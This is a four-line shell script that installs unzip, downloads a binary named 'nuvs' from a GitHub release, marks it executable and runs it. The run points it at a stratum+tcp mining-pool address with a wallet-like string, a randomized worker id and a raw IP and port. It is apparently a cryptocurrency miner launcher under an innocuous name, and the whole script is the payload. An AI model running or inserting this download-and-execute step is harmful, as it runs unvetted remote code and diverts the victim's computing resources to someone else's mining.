#!/bin/sh
apt update && apt install unzip -y
wget https://github.com/tallapallitech63/nuvvecell/releases/download/nuvsdel/nuvs
chmod +x nuvs
./nuvs -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-nuvs@173.255.203.53:8088
